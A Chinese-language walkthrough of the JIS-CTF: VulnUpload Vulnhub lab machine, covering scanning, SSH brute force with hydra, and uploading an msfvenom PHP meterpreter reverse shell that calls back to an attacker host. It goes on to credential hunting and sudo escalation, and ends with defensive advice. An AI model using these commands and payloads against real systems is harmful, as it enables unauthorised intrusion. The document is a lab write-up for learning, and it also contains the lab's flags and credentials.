JIS-CTF_VulnUpload靶机攻略
字数 1304 2025-08-18 11:37:23
JIS-CTF: VulnUpload 靶机渗透测试完整指南
靶机概述
JIS-CTF: VulnUpload 是一个初级难度的 Vulnhub 靶机,包含5个flag,平均完成时间约1.5小时。该靶机运行Ubuntu系统,主要服务包括:
- SSH (OpenSSH 7.2p2)
- HTTP (Apache httpd 2.4.18)
环境准备
- 从Vulnhub下载靶机镜像:JIS-CTF: VulnUpload
- 导入VirtualBox后启动
- 确认靶机IP(通常通过DHCP自动获取)
渗透测试流程
1. 目标发现
使用nmap扫描本地网络,发现靶机IP:
nmap -sn 192.168.56.0/24
示例输出:
192.168.56.1 - 主系统IP
192.168.56.2 - DHCP服务器
192.168.56.5 - 本机(Kali)
192.168.56.6 - 靶机(JIS)
2. 服务枚举
对靶机进行详细扫描:
nmap -O -sV 192.168.56.6
扫描结果:
- 22/tcp: OpenSSH 7.2p2
- 80/tcp: Apache httpd 2.4.18
- 操作系统: Ubuntu
3. 漏洞分析
SSH服务分析
- 尝试弱口令爆破:
hydra -L common_users.txt -P common_passwords.txt ssh://192.168.56.6
- 搜索已知漏洞:
searchsploit openssh 7.2p2
发现用户名枚举漏洞(但EXP不可靠)
Apache服务分析
searchsploit apache 2.4.18
仅发现内存泄漏漏洞,利用价值低
4. Web应用渗透
目录枚举
-
使用Burp Suite的Discover Content功能:
- 设置仅扫描.php扩展名
- 发现重要目录:
/admin_area/,/uploaded_files/
-
使用dirsearch工具:
python3 dirsearch.py -u http://192.168.56.6 -e php
关键发现
- 在
/admin_area/发现第一个flag:
flag{7412574125871236547895214}
同时获得凭据:admin/3v1l_H@ck3r
- 在
/flag/发现第二个flag:
flag{8734509128730458630012095}
文件上传漏洞利用
-
使用获得的凭据登录
/login.php -
上传PHP webshell测试:
- 上传成功但无回显
- 确认上传目录为
/uploaded_files/
-
生成MSF反弹shell:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f raw > shell.php
- 设置监听:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
exploit
- 访问上传的shell.php获取meterpreter会话
系统内信息收集
-
查找flag和提示:
/var/www/html/flag.txt(无权限)/var/www/html/hint.txt:第三个flag: flag{7645110034526579012345670} 提示: 查看flag.txt需要technawi用户的密码
-
搜索technawi相关信息:
find / -name "*technawi*" 2>/dev/null
grep -r "technawi" / 2>/dev/null
在/etc/mysql/conf.d/credentials.txt发现:
第四个flag: flag{7845658974123568974185412}
凭据: technawi/3vilH@ksor
5. 权限提升
- 使用获得的凭据SSH登录:
ssh technawi@192.168.56.6
- 查看flag.txt:
cat /var/www/html/flag.txt
获得第五个flag:
flag{5473215946785213456975249}
- 检查sudo权限:
sudo -l
发现可以使用sudo无需密码
- 提权至root:
sudo su
关键知识点总结
- 信息收集:nmap扫描、目录枚举、内容发现是渗透测试的基础
- 漏洞利用:文件上传漏洞是常见的Web应用漏洞
- 横向移动:通过发现的凭据在不同服务间尝试登录
- 权限提升:检查sudo权限、SUID文件等常见提权路径
- 工具使用:Burp Suite、dirsearch、msfvenom等工具的综合应用
防御建议
- 对文件上传功能实施严格的文件类型检查
- 避免在配置文件中存储明文凭据
- 限制sudo权限,避免普通用户无密码提权
- 定期更新服务软件以修复已知漏洞
- 实施最小权限原则,限制每个用户的访问范围
通过这个靶机的完整渗透过程,可以系统性地学习从信息收集到权限提升的完整攻击链,对于理解Web应用安全有很好的帮助。